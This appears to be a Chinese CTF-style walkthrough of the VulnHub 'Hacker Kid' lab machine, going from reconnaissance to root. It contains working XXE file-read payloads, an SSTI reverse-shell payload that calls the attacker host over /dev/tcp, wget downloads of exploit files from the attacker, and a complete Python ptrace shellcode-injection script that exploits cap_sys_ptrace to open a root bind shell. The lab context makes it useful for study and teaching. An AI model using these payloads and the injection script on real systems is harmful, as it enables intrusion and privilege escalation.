实验主机:攻击机kali(192.168.109.131)
靶机Hacker_Kid-v1.0.1(192.168.109.133)
实验目标:获取root权限
实验网络:NAT
靶机下载地址:Hacker kid: 1.0.1 ~ VulnHub
一:信息收集
步骤一:确定靶机IP地址
arp-scan -l
步骤二:探测靶机开放端口
nmap -T4 -sV -O -p- -Pn 192.168.109.133
发现开放了53(DNS) 80 9999端口
浏览器访问IP地址
步骤三:目录扫描
#项目地址 https://github.com/maurosoria/dirsearch # python dirsearch.py -u "http://192.168.109.133"
步骤四:访问80端口查看源码发现让我们使用参数page_no
当page_no=1时提示更深入一点
使用BurpSuite进行抓包爆破
将抓到的包发送到 Intruder模块 设置完成后进行攻击爆破
爆破发现21与其他不同
二:漏洞探测及利用
DNS区域传输
步骤一:编辑hosts文件
vi /etc/hosts 192.168.109.133 hackers.blackhat.local //添加的内容
使用提到的dig命令 可得到所有的DNS解析记录
dig hackers.blackhat.local @192.168.109.133
步骤二:再次编辑hosts文件将刚得到解析记录也添加进去
vi /etc/hosts 192.168.109.133 hackerkid.blackhat.local 192.168.109.133 blackhat.local
步骤三:对添加的域名进行访问 打开来到一个注册页面 查看源代码发现了 XML 语句
XXE注入
步骤一:先抓包看看 构造语句进行文件查看
<!DOCTYPE foo [<!ENTITY test SYSTEM 'file:///etc/passwd'>]>
步骤二:尝试用php伪协议访问saket的文件.bashrdc
<!DOCTYPE foo [<!ENTITY test SYSTEM 'php://filter/read=convert.base64-encode/resource=/home/saket/.bashrc'>]>
得到通过Base64加密的密文 进行解密
步骤三:得到用户名和密码尝试在9999端口登录
username="admin" password="Saket!#$%@!!"
登录失败分析原因
由于该文件是在 /home/saket 目录下面的 重新整理为
username="saket" password="Saket!#$%@!!"
页面有name可能是变量
SSTI模板注入
步骤一:这里给出了一个模板注入通用的测试payload
{{1+abcdef}}${1+abcdef}<?1+abcdef?>[1+abcdef]
如果使用该payload后发现页面产生了如下图所示的报错,也是可以说明存在模板注入漏洞
步骤二:尝试反弹shell
{% import os %}{{os.system('bash -c "bash -i &> /dev/tcp/192.168.109.131/4444 0>&1"')}}
进行url编码试一下
%7b%25%20import%20os%20%25%7d%7b%7bos.system('bash%20-c%20%22bash%20-i%20%26%3e%20%2fdev%2ftcp%2f192.168.109.131%2f4444%200%3e%261%22')%7d%7d
kali开启监听
nc -lvvp 4444
反弹成功
三:提权
步骤一:查找SUID
find / -perm -u=s -type f 2>/dev/null
步骤二:使用 CVE-2021-4034 漏洞
项目地址# https://github.com/berdav/CVE-2021-4034
将该漏洞zip文件下载到kali中 在本地开启http服务将该文件下载到靶机中
kali# python -m http.server 8080 shell# wget http://192.168.109.131:8080/CVE-2021-4034-main.zip ls
将下载过来的文件进行解压
unzip CVE-2021-4034-main.zip ls cd CVE-2021-4034-main ls ./cve-2021-4034.c
失败了...
Capabilitie提权
1.使用如下命令发现具有Capabilities特殊操作权限的程序
/usr/sbin/getcap -r / 2>/dev/null -r //递归查询
发现python具备cap_sys_ptrace+ep 能力,所以我们可以对其进行利用然后进行提权
2.在kali上编辑提权脚本 命名为exploit.py
# inject.py# The C program provided at the GitHub Link given below can be used as a reference for writing the python script.
# GitHub Link: https://github.com/0x00pf/0x00sec_code/blob/master/mem_inject/infect.c
import ctypes
import sys
import struct
# Macros defined in <sys/ptrace.h>
# https://code.woboq.org/qt5/include/sys/ptrace.h.html
PTRACE_POKETEXT = 4
PTRACE_GETREGS = 12
PTRACE_SETREGS = 13
PTRACE_ATTACH = 16
PTRACE_DETACH = 17
# Structure defined in <sys/user.h>
# https://code.woboq.org/qt5/include/sys/user.h.html#user_regs_struct
class user_regs_struct(ctypes.Structure):
_fields_ = [
("r15", ctypes.c_ulonglong),
("r14", ctypes.c_ulonglong),
("r13", ctypes.c_ulonglong),
("r12", ctypes.c_ulonglong),
("rbp", ctypes.c_ulonglong),
("rbx", ctypes.c_ulonglong),
("r11", ctypes.c_ulonglong),
("r10", ctypes.c_ulonglong),
("r9", ctypes.c_ulonglong),
("r8", ctypes.c_ulonglong),
("rax", ctypes.c_ulonglong),
("rcx", ctypes.c_ulonglong),
("rdx", ctypes.c_ulonglong),
("rsi", ctypes.c_ulonglong),
("rdi", ctypes.c_ulonglong),
("orig_rax", ctypes.c_ulonglong),
("rip", ctypes.c_ulonglong),
("cs", ctypes.c_ulonglong),
("eflags", ctypes.c_ulonglong),
("rsp", ctypes.c_ulonglong),
("ss", ctypes.c_ulonglong),
("fs_base", ctypes.c_ulonglong),
("gs_base", ctypes.c_ulonglong),
("ds", ctypes.c_ulonglong),
("es", ctypes.c_ulonglong),
("fs", ctypes.c_ulonglong),
("gs", ctypes.c_ulonglong),
]
libc = ctypes.CDLL("libc.so.6")
pid=int(sys.argv[1])
# Define argument type and respone type.
libc.ptrace.argtypes = [ctypes.c_uint64, ctypes.c_uint64, ctypes.c_void_p, ctypes.c_void_p]
libc.ptrace.restype = ctypes.c_uint64
# Attach to the process
libc.ptrace(PTRACE_ATTACH, pid, None, None)
registers=user_regs_struct()
# Retrieve the value stored in registers
libc.ptrace(PTRACE_GETREGS, pid, None, ctypes.byref(registers))
print("Instruction Pointer: " + hex(registers.rip))
print("Injecting Shellcode at: " + hex(registers.rip))
# Shell code copied from exploit db.
shellcode="\x48\x31\xc0\x48\x31\xd2\x48\x31\xf6\xff\xc6\x6a\x29\x58\x6a\x02\x5f\x0f\x05\x48\x97\x6a\x02\x66\xc7\x44\x24\x02\x15\xe0\x54\x5e\x52\x6a\x31\x58\x6a\x10\x5a\x0f\x05\x5e\x6a\x32\x58\x0f\x05\x6a\x2b\x58\x0f\x05\x48\x97\x6a\x03\x5e\xff\xce\xb0\x21\x0f\x05\x75\xf8\xf7\xe6\x52\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x8d\x3c\x24\xb0\x3b\x0f\x05"
# Inject the shellcode into the running process byte by byte.
for i in xrange(0,len(shellcode),4):
# Convert the byte to little endian.
shellcode_byte_int=int(shellcode[i:4+i].encode('hex'),16)
shellcode_byte_little_endian=struct.pack("<I", shellcode_byte_int).rstrip('\x00').encode('hex')
shellcode_byte=int(shellcode_byte_little_endian,16)
# Inject the byte.
libc.ptrace(PTRACE_POKETEXT, pid, ctypes.c_void_p(registers.rip+i),shellcode_byte)
print("Shellcode Injected!!")
# Modify the instuction pointer
registers.rip=registers.rip+2
# Set the registers
libc.ptrace(PTRACE_SETREGS, pid, None, ctypes.byref(registers))
print("Final Instruction Pointer: " + hex(registers.rip))
# Detach from the process.
libc.ptrace(PTRACE_DETACH, pid, None, None)
3.在kali本地开启http服务将该文件下载到靶机中
kali# python -m http.server 8080 shell# wget http://192.168.109.131:8080/exploit.py ls
4.因需要root进程进行注入,编写脚本对root进程批量尝试
for i in `ps -ef|grep root|grep -v "grep"|awk '{print $2}'`; do python2.7 exploit.py $i; done
脚本执行成功,可以看到5600端口正在监听 使用nc直接连接即可完成提权操作
netstat -lntp | grep 5600 nc 192.168.109.133 5600
over...
562
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
